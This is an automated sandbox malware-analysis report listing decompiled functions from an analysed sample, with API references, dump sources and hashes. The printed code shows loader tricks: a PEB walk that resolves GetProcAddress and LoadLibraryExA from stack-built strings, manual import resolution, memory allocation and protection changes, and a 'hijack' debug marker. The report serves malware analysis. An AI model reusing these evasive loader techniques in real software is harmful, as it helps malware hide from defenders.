                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040534e
                                                                                                                                                      0x0040534c
                                                                                                                                                      0x00405311
                                                                                                                                                      0x00405361
                                                                                                                                                      0x00405361
                                                                                                                                                      0x00405361
                                                                                                                                                      0x00405366

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00405293
                                                                                                                                                        • Part of subcall function 00405599: VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004052E0,?,?), ref: 0040565D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID: mQ@
                                                                                                                                                      • API String ID: 4275171209-1781705956
                                                                                                                                                      • Opcode ID: 9c407e420437b85d8e606006875fc3966ea18b5a4a51b90f826934547bd30036
                                                                                                                                                      • Instruction ID: dbaf598f9aa3cdeea1fef9ad7be1053e3f902deb7a8d8a95dff736660d86b170
                                                                                                                                                      • Opcode Fuzzy Hash: 9c407e420437b85d8e606006875fc3966ea18b5a4a51b90f826934547bd30036
                                                                                                                                                      • Instruction Fuzzy Hash: 5921F9B5E00109AFCB44DFA9C881DAFBBB5FF8C300B108259E904A7345E679E951CFA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F1D0, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001F1D0(void* __edi, intOrPtr _a4, char _a8) {
				char* _v8;
				char _v70491;
				char _v70492;
				void* _t12;
				void* _t16;

				E10018AA0(0x11358); // executed
				_t12 = E1001F1C0(); // executed
				if(_t12 != 0) {
					_v70492 = 0;
					E1000CF20(__edi,  &_v70491, 0, 0x1134f);
					_v8 =  &_a8;
					_t16 = E10001D10( &_v70492, 0x1134f, _a4, _v8);
					_v8 = 0;
					OutputDebugStringA( &_v70492);
					return _t16;
				}
				return _t12;
			}








                                                                                                                                                      0x1001f1d8
                                                                                                                                                      0x1001f1dd
                                                                                                                                                      0x1001f1e4
                                                                                                                                                      0x1001f1e6
                                                                                                                                                      0x1001f1fb
                                                                                                                                                      0x1001f206
                                                                                                                                                      0x1001f21d
                                                                                                                                                      0x1001f225
                                                                                                                                                      0x1001f233
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001f233
                                                                                                                                                      0x1001f23c

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 1001F1C0: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,100227A9,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                      • _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                        • Part of subcall function 10001D10: __vsnprintf_s.LIBCMT ref: 10001D27
                                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3726070730-0
                                                                                                                                                      • Opcode ID: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
                                                                                                                                                      • Instruction ID: d1c4eaeef2fe96386540b73fb7cae86f07877a9616b03c9c3f3d83701942bdc8
                                                                                                                                                      • Opcode Fuzzy Hash: 2524b0902bb6863752e16d8784e8157a0219e7e2b3e8697a48ef5fbb85983224
                                                                                                                                                      • Instruction Fuzzy Hash: DDF09079900348B7DB48DBE5DC46FE9B37EDB04A00F5440C9FA1897649EA70F7848BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000F7BF, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000F7BF(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10333310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F764(__eflags);
					__eflags = _t7 - 3;
					 *0x10335f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA34(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10333310);
							 *0x10333310 =  *0x10333310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                      0x1000f7d0
                                                                                                                                                      0x1000f7d8
                                                                                                                                                      0x1000f7dd
                                                                                                                                                      0x1000f7e2
                                                                                                                                                      0x1000f7e7
                                                                                                                                                      0x1000f7ea
                                                                                                                                                      0x1000f7ef
                                                                                                                                                      0x1000f815
                                                                                                                                                      0x1000f817
                                                                                                                                                      0x1000f818
                                                                                                                                                      0x1000f7f1
                                                                                                                                                      0x1000f7f6
                                                                                                                                                      0x1000f7fb
                                                                                                                                                      0x1000f7fe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000f800
                                                                                                                                                      0x1000f806
                                                                                                                                                      0x1000f80c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000f80c
                                                                                                                                                      0x1000f7fe
                                                                                                                                                      0x1000f7df
                                                                                                                                                      0x1000f7df
                                                                                                                                                      0x1000f7e1
                                                                                                                                                      0x1000f7e1

                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3296620671-0
                                                                                                                                                      • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                      • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405A26, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00405A26() {
				struct HINSTANCE__* _t54;
				intOrPtr _t55;
				intOrPtr _t64;
				intOrPtr* _t71;
				void* _t100;

				do {
					 *((intOrPtr*)(_t100 - 0x10)) =  *((intOrPtr*)(_t100 - 0x10)) + 0x14;
					if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0xc)) != 0) {
						_t54 = LoadLibraryExA( *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0xc)), 0, 0); // executed
						 *(_t100 - 0x1c) = _t54;
						if( *(_t100 - 0x1c) != 0) {
							_t71 =  *((intOrPtr*)(_t100 - 0x10));
							if( *_t71 == 0) {
								_t55 =  *((intOrPtr*)(_t100 - 0x10));
								asm("lock mov ecx, [ebp-0xc]");
								 *(_t100 - 0x18) = _t71 +  *((intOrPtr*)(_t55 + 0x10));
								 *((intOrPtr*)(_t100 - 0x14)) =  *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0x10));
							} else {
								 *(_t100 - 0x18) =  *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10))));
								 *((intOrPtr*)(_t100 - 0x14)) =  *((intOrPtr*)(_t100 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x10)) + 0x10));
							}
							while( *( *(_t100 - 0x18)) != 0) {
								if(( *( *(_t100 - 0x18)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t100 - 0x20)) =  *((intOrPtr*)(_t100 - 0xc)) +  *( *(_t100 - 0x18));
									 *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x14)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t100 + 8)) + 0x10))))( *(_t100 - 0x1c),  *((intOrPtr*)(_t100 - 0x20)) + 2);
								} else {
									_t64 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t100 + 8)) + 0x10))))( *(_t100 - 0x1c),  *( *(_t100 - 0x18)) & 0x0000ffff);
									 *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x14)))) = _t64;
								}
								if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x14)))) != 0) {
									 *(_t100 - 0x18) =  &(( *(_t100 - 0x18))[1]);
									 *((intOrPtr*)(_t100 - 0x14)) =  *((intOrPtr*)(_t100 - 0x14)) + 4;
									continue;
								} else {
									 *(_t100 - 8) = 0;
								}
								goto L19;
							}
							goto L19;
						} else {
							 *(_t100 - 8) = 0;
						}
					}
					L21:
					return  *(_t100 - 8);
					L19:
				} while ( *(_t100 - 8) != 0);
				goto L21;
			}








                                                                                                                                                      0x00405a26
                                                                                                                                                      0x0040592c
                                                                                                                                                      0x00405936
                                                                                                                                                      0x00405950
                                                                                                                                                      0x00405952
                                                                                                                                                      0x00405959
                                                                                                                                                      0x00405967
                                                                                                                                                      0x0040596d
                                                                                                                                                      0x00405988
                                                                                                                                                      0x0040598a
                                                                                                                                                      0x00405991
                                                                                                                                                      0x0040599d
                                                                                                                                                      0x0040596f
                                                                                                                                                      0x00405977
                                                                                                                                                      0x00405983
                                                                                                                                                      0x00405983
                                                                                                                                                      0x004059b4
                                                                                                                                                      0x004059c7
                                                                                                                                                      0x004059f0
                                                                                                                                                      0x00405a09
                                                                                                                                                      0x004059c9
                                                                                                                                                      0x004059df
                                                                                                                                                      0x004059e4
                                                                                                                                                      0x004059e4
                                                                                                                                                      0x00405a11
                                                                                                                                                      0x004059a8
                                                                                                                                                      0x004059b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405a13
                                                                                                                                                      0x00405a13
                                                                                                                                                      0x00405a13
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405a11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040595b
                                                                                                                                                      0x0040595b
                                                                                                                                                      0x0040595b
                                                                                                                                                      0x00405959
                                                                                                                                                      0x00405a2b
                                                                                                                                                      0x00405a31
                                                                                                                                                      0x00405a1e
                                                                                                                                                      0x00405a1e
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00405950
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
                                                                                                                                                      • Instruction ID: c89216279029861e0f2a02b5bb4ee4984ca54bd28e079509e5cd61ee92033d32
                                                                                                                                                      • Opcode Fuzzy Hash: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
                                                                                                                                                      • Instruction Fuzzy Hash: E84175B4A0060ADFDB04CF88D891BAEB7B1FF88314F248569D5157B395C734A941CFA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040572E, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 004057F8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
                                                                                                                                                      • Instruction ID: 1067a663c85961089580c26c4081082774dbeea73ac4ade2580fe47cc0d80685
                                                                                                                                                      • Opcode Fuzzy Hash: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
                                                                                                                                                      • Instruction Fuzzy Hash: 0041D974A00619DFDB08CF88D590AADBBF2FB8C314F249259E50AAB394C734AD81DF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A348, Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A348() {
				intOrPtr _t4;
				void* _t6;

				RegCloseKey( *(_t6 - 4)); // executed
				_t4 =  *((intOrPtr*)(_t6 - 8));
				return _t4;
			}





                                                                                                                                                      0x1001a355
                                                                                                                                                      0x1001a35b
                                                                                                                                                      0x1001a361

                                                                                                                                                      APIs
                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                      • Instruction ID: 4111118035c4145df5d6207d544e668d3b67a138326457bd21328434b6feecb4
                                                                                                                                                      • Opcode Fuzzy Hash: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
                                                                                                                                                      • Instruction Fuzzy Hash: 0BB09239A00208ABCB28DB94D99896CBBB4EB49211B2002C8FD1957300CA32DE909B50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100196B0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100196B0() {
				intOrPtr _t2;

				EnumWindows(E100193D0, 0);
				_t2 =  *0x10333dcc; // 0x0
				return _t2;
			}




                                                                                                                                                      0x100196ba
                                                                                                                                                      0x100196c0
                                                                                                                                                      0x100196c6

                                                                                                                                                      APIs
                                                                                                                                                      • EnumWindows.USER32(100193D0,00000000), ref: 100196BA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnumWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1129996299-0
                                                                                                                                                      • Opcode ID: 77b17112a631a8c199090b994af9cf4bc8f4f79ff00ce9b4e913f7e21da1a7ac
                                                                                                                                                      • Instruction ID: 322803dc277e48624d363f96edb163e9ed7c0b181a64caac93bb68219832c0f6
                                                                                                                                                      • Opcode Fuzzy Hash: 77b17112a631a8c199090b994af9cf4bc8f4f79ff00ce9b4e913f7e21da1a7ac
                                                                                                                                                      • Instruction Fuzzy Hash: 36B09230240219A7D20097859C8AB40B7ACE344A54F508001F6085B6928AA1A4118555
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000EBD1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E10015254();
				_push(_a4);
				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                      0x1000ebd1
                                                                                                                                                      0x1000ebd6
                                                                                                                                                      0x1000ebe2
                                                                                                                                                      0x1000ebe8

                                                                                                                                                      APIs
                                                                                                                                                      • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___security_init_cookie
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3657697845-0
                                                                                                                                                      • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                      • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                      • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                      • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00404E19, Relevance: 35.1, Strings: 28, Instructions: 61COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E00404E19(intOrPtr* _a4, char _a8, char _a12) {
				void* _v5;
				char _v8;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v32;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr* _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _t131;

				_v64 = 0;
				_v28 = 0;
				_v72 = 0;
				_v88 = 0;
				_v60 = 0;
				_v84 = 0;
				_v8 = 0;
				_v80 = 0;
				_v56 = 0;
				_v52 = 0;
				_v76 = 0;
				_v32 = 0;
				_v92 = 0;
				_v68 = 0;
				_v48 = 0x47;
				_v47 = 0x65;
				_v46 = 0x74;
				_v45 = 0x50;
				_v44 = 0x72;
				_v43 = 0x6f;
				_v42 = 0x63;
				_v41 = 0x41;
				_v40 = 0x64;
				_v39 = 0x64;
				_v38 = 0x72;
				_v37 = 0x65;
				_v36 = 0x73;
				_v35 = 0x73;
				_v34 = 0;
				_v24 = 0x4c;
				_v23 = 0x6f;
				_v22 = 0x61;
				_v21 = 0x64;
				_v20 = 0x4c;
				_v19 = 0x69;
				_v18 = 0x62;
				_v17 = 0x72;
				_v16 = 0x61;
				_v15 = 0x72;
				_v14 = 0x79;
				_v13 = 0x45;
				_v12 = 0x78;
				_v11 = 0x41;
				_v10 = 0;
				_v64 =  *[fs:0x30];
				_v28 =  *((intOrPtr*)(_v64 + 0xc));
				_v72 =  *((intOrPtr*)(_v28 + 0x1c));
				_v72 =  *_v72;
				_v88 =  *((intOrPtr*)(_v72 + 8));
				_v60 =  *((intOrPtr*)(_v72 + 0x20));
				 *_a4 = _v88;
				_v68 =  *((intOrPtr*)(_v88 + 0x3c));
				_v84 = _v88 +  *((intOrPtr*)(_v88 + _v68 + 0x78));
				_t131 = _v84;
				_push(_t131);
				asm("sbb [ecx+0x458bcc55], cl");
				asm("lodsb");
				_v52 = _t131 +  *0x000000A7;
				_v76 = _v88 +  *((intOrPtr*)(_v84 + 0x20));
				_v92 = _v88 +  *((intOrPtr*)(_v84 + 0x24));
				_t81 =  &_v24; // 0x4c
				_v32 = E00404FF9(_v84, _t81);
				_v8 = E00405049(_v88, _v52, _v76, _v92, _v56, _v32);
				_t90 =  &_a8; // 0x61
				 *((intOrPtr*)( *_t90)) = _v8;
				_t92 =  &_v48; // 0x47
				_v32 = E00404FF9( *_t90, _t92);
				_v80 = E00405049(_v88, _v52, _v76, _v92, _v56, _v32);
				_t101 =  &_a12; // 0x4c
				 *((intOrPtr*)( *_t101)) = _v80;
				return 1;
			}

















































                                                                                                                                                      0x00404e1f
                                                                                                                                                      0x00404e26
                                                                                                                                                      0x00404e2d
                                                                                                                                                      0x00404e34
                                                                                                                                                      0x00404e3b
                                                                                                                                                      0x00404e42
                                                                                                                                                      0x00404e49
                                                                                                                                                      0x00404e50
                                                                                                                                                      0x00404e57
                                                                                                                                                      0x00404e5e
                                                                                                                                                      0x00404e65
                                                                                                                                                      0x00404e6c
                                                                                                                                                      0x00404e73
                                                                                                                                                      0x00404e7a
                                                                                                                                                      0x00404e81
                                                                                                                                                      0x00404e85
                                                                                                                                                      0x00404e89
                                                                                                                                                      0x00404e8d
                                                                                                                                                      0x00404e91
                                                                                                                                                      0x00404e95
                                                                                                                                                      0x00404e99
                                                                                                                                                      0x00404e9d
                                                                                                                                                      0x00404ea1
                                                                                                                                                      0x00404ea5
                                                                                                                                                      0x00404ea9
                                                                                                                                                      0x00404ead
                                                                                                                                                      0x00404eb1
                                                                                                                                                      0x00404eb5
                                                                                                                                                      0x00404eb9
                                                                                                                                                      0x00404ebd
                                                                                                                                                      0x00404ec1
                                                                                                                                                      0x00404ec5
                                                                                                                                                      0x00404ec9
                                                                                                                                                      0x00404ecd
                                                                                                                                                      0x00404ed1
                                                                                                                                                      0x00404ed5
                                                                                                                                                      0x00404ed9
                                                                                                                                                      0x00404edd
                                                                                                                                                      0x00404ee1
                                                                                                                                                      0x00404ee5
                                                                                                                                                      0x00404ee9
                                                                                                                                                      0x00404eed
                                                                                                                                                      0x00404ef1
                                                                                                                                                      0x00404ef5
                                                                                                                                                      0x00404eff
                                                                                                                                                      0x00404f08
                                                                                                                                                      0x00404f11
                                                                                                                                                      0x00404f19
                                                                                                                                                      0x00404f22
                                                                                                                                                      0x00404f2b
                                                                                                                                                      0x00404f34
                                                                                                                                                      0x00404f3c
                                                                                                                                                      0x00404f4b
                                                                                                                                                      0x00404f4e
                                                                                                                                                      0x00404f52
                                                                                                                                                      0x00404f53
                                                                                                                                                      0x00404f5c
                                                                                                                                                      0x00404f60
                                                                                                                                                      0x00404f6c
                                                                                                                                                      0x00404f78
                                                                                                                                                      0x00404f7b
                                                                                                                                                      0x00404f84
                                                                                                                                                      0x00404fa4
                                                                                                                                                      0x00404fa7
                                                                                                                                                      0x00404fad
                                                                                                                                                      0x00404faf
                                                                                                                                                      0x00404fb8
                                                                                                                                                      0x00404fd8
                                                                                                                                                      0x00404fdb
                                                                                                                                                      0x00404fe1
                                                                                                                                                      0x00404feb

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: A$A$E$G$L$L$P$a$a$b$c$d$d$d$e$e$i$o$o$r$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 0-2414563060
